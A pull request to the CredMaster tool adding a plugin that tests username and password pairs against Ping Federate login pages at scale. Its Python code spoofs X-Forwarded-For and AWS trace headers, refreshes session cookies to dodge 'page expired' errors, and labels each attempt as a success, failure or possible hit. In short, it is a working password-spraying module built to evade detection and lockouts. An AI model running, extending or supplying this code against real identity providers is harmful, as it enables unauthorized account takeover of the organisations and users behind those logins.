### PR TITLE
Add plugin for Ping federated authentication

### DIFF
--- a/README.md
+++ b/README.md
@@ -63,6 +63,8 @@ The following plugins are currently supported:
   * `--plugin httpbrute`
 * [GMailEnum](https://github.com/knavesec/CredMaster/wiki/GmailEnum) - GSuite/Gmail enumeration
   * `--plugin gmailenum`
+* [PingFed](https://github.com/knavesec/CredMaster/wiki/PingFed) - Ping Federated Authentication
+  * `--plugin pingfed`
 
 
 Example Use:
@@ -114,6 +116,7 @@ PRs welcome :)
 - Andy Gill ([ZephrFish](https://twitter.com/ZephrFish)) - Colour functions + Tweaks/Notifications, helping on dev rewrite, AzVault module
 - Hugo VINCENT ([@hugow](https://twitter.com/hugow_vincent)) - Batch size / delay
 - Dennis Herrmann ([dhn_](https://twitter.com/dhn_) from [CODE WHITE GmbH](https://twitter.com/codewhitesec)) - Ntfy notifying support
+- Jason Juntunen ([missing0x00](https://twitter.com/missing0x00)) - PingFed plugin
 
 
 Feel free to drop me a line

--- a/plugins/pingfed/__init__.py
+++ b/plugins/pingfed/__init__.py
@@ -34,6 +34,6 @@ def testconnect(pluginargs, args, api_dict, useragent):
         output = "Testconnect: Connection failed, endpoint timed out, exiting"
         success = False
     else:
-        output = "Testconnect: Connection success, continuing"
+        output = "Testconnect: Connection success, continuing. WARNING - This plugin is in beta and has not been rigorously tested!"
 
     return success, output, pluginargs

--- a/plugins/pingfed/__init__.py
+++ b/plugins/pingfed/__init__.py
@@ -1,0 +1,39 @@
+import requests
+import utils.utils as utils
+requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+
+
+def validate(pluginargs, args):
+    #
+    # Plugin Args
+    #
+    # --url https://ping.domain.com   ->  Ping target
+    #
+    if "url" in pluginargs.keys():
+        return True, None, pluginargs
+    else:
+        error = "Missing url, specify as --url https://ping.domain.com"
+        return False, error, None
+
+
+def testconnect(pluginargs, args, api_dict, useragent):
+
+    success = True
+    headers = {
+        "User-Agent" : useragent,
+        "X-My-X-Forwarded-For" : utils.generate_ip(),
+        "x-amzn-apigateway-api-id" : utils.generate_id(),
+        "X-My-X-Amzn-Trace-Id" : utils.generate_trace_id(),
+    }
+
+    headers = utils.add_custom_headers(pluginargs, headers)
+
+    resp = requests.get(api_dict["proxy_url"], headers=headers)
+
+    if resp.status_code == 504:
+        output = "Testconnect: Connection failed, endpoint timed out, exiting"
+        success = False
+    else:
+        output = "Testconnect: Connection success, continuing"
+
+    return success, output, pluginargs

--- a/plugins/pingfed/pingfed.py
+++ b/plugins/pingfed/pingfed.py
@@ -63,7 +63,7 @@ def pingfed_authenticate(url, username, password, useragent, pluginargs):
         resp = sess.post(f"{url}{action}", headers=headers, params=params_data, data=post_data, allow_redirects=False) 
         page = BeautifulSoup(resp.text, features="html.parser")
 
-        if resp.status_code == 302:
+        if "idp_account_id" in resp.text:
             data_response['result'] = "success"
             data_response['output'] = f"[+] SUCCESS: => {username}:{password}"
             data_response['valid_user'] = True
@@ -71,7 +71,7 @@ def pingfed_authenticate(url, username, password, useragent, pluginargs):
         # Check if page has password field
         elif "pf.pass" not in resp.text:
             data_response['result'] = "potential"
-            data_response['output'] = f"[?] UNKNOWN_RESPONSE_CODE: {resp.status_code} => {username}:{password}"
+            data_response['output'] = f"[?] UNKNOWN: {resp.status_code} => {username}:{password}"
 
         else:  # fail
             data_response['result'] = "failure"

--- a/plugins/pingfed/pingfed.py
+++ b/plugins/pingfed/pingfed.py
@@ -1,0 +1,92 @@
+import requests
+import utils.utils as utils
+from bs4 import BeautifulSoup
+requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+
+
+def pingfed_authenticate(url, username, password, useragent, pluginargs):
+
+    data_response = {
+        'result' : None,    # Can be "success", "failure" or "potential"
+        'error' : False,
+        'output' : "",
+        'valid_user' : False
+    }
+
+    post_data = {
+        'pf.username' : username,
+        'pf.pass' : password,
+        'pf.ok' : 'clicked',
+        'pf.cancel' : '',
+        'pf.adapterId' : 'PingOneHTMLFormAdapter'
+    }
+
+    # ?client-request-id=&wa=wsignin1.0&wtrealm=urn:federation:MicrosoftOnline&wctx=cbcxt=&username={}&mkt=&lc=
+    params_data =  {
+        'client-request-id' : '',
+        'wa' : 'wsignin1.0',
+        'wtrealm' : 'urn:federation:MicrosoftOnline',
+        'wctx' : '',
+        'cbcxt' : '',
+        'username' : username,
+        'mkt' : '',
+        'lc' : '',
+        'pullStatus' : 0
+    }
+
+    spoofed_ip = utils.generate_ip()  # maybe use client related IP address
+    amazon_id = utils.generate_id()
+    trace_id = utils.generate_trace_id()
+
+    headers = {
+        'User-Agent' : useragent,
+        "X-My-X-Forwarded-For" : spoofed_ip,
+        "x-amzn-apigateway-api-id" : amazon_id,
+        "X-My-X-Amzn-Trace-Id" : trace_id,
+
+        'Content-Type' : 'application/x-www-form-urlencoded',
+        'Accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9, image/webp,*/*;q=0.8'
+    }
+
+    headers = utils.add_custom_headers(pluginargs, headers)
+
+    try: 
+        full_url = f"{url}/idp/prp.wsf"
+
+        # Get cookie and form action URL. Update with each request to avoid "page expired" responses.
+        sess = requests.session()
+        resp = sess.get(full_url, headers=headers, params=params_data)
+        page = BeautifulSoup(resp.text, features="html.parser")
+        action = page.find('form').get('action')
+
+        # Auth attempt
+        resp = sess.post(f"{url}{action}", headers=headers, params=params_data, data=post_data, allow_redirects=False) 
+        page = BeautifulSoup(resp.text, features="html.parser")
+
+        if resp.status_code == 302:
+            data_response['result'] = "success"
+            data_response['output'] = f"[+] SUCCESS: => {username}:{password}"
+            data_response['valid_user'] = True
+
+        # Check if page has password field
+        elif "pf.pass" not in resp.text:
+            data_response['result'] = "potential"
+            data_response['output'] = f"[?] UNKNOWN_RESPONSE_CODE: {resp.status_code} => {username}:{password}"
+
+        else:  # fail
+            data_response['result'] = "failure"
+            data_response['output'] = f"[-] FAILURE: {resp.status_code} => {username}:{password}"
+
+        # Append "ping-messages" section from response for debugging
+        try: 
+            message = page.find("div", {"class":"ping-messages"}).text.strip()
+            data_response['output'] += f" Message: {message}"
+        except Exception as ex:
+            pass
+
+    except Exception as ex:
+        data_response['error'] = True
+        data_response['output'] = ex
+        pass
+
+    return data_response


### PR DESCRIPTION
Main requirement for the Ping authentication flow is that it needs a new URI and cookie value with each request, otherwise it will start returning "page expired" warnings.

I included a section which will append the "ping-messages" div from the response to ensure accuracy. This can be removed if it's too verbose, most of the messages will just be "We didn't recognize the username or password you entered. Please try again."